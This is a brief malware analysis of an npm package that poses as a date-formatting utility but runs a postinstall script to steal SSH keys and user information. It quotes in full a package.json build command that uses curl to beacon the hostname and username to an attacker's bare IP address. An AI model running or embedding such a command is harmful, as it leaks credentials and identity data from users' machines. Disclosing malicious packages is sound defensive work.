The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install. The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post — a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration. The package.json additionally declares a build script curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami) that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential-harvesting on installer machines.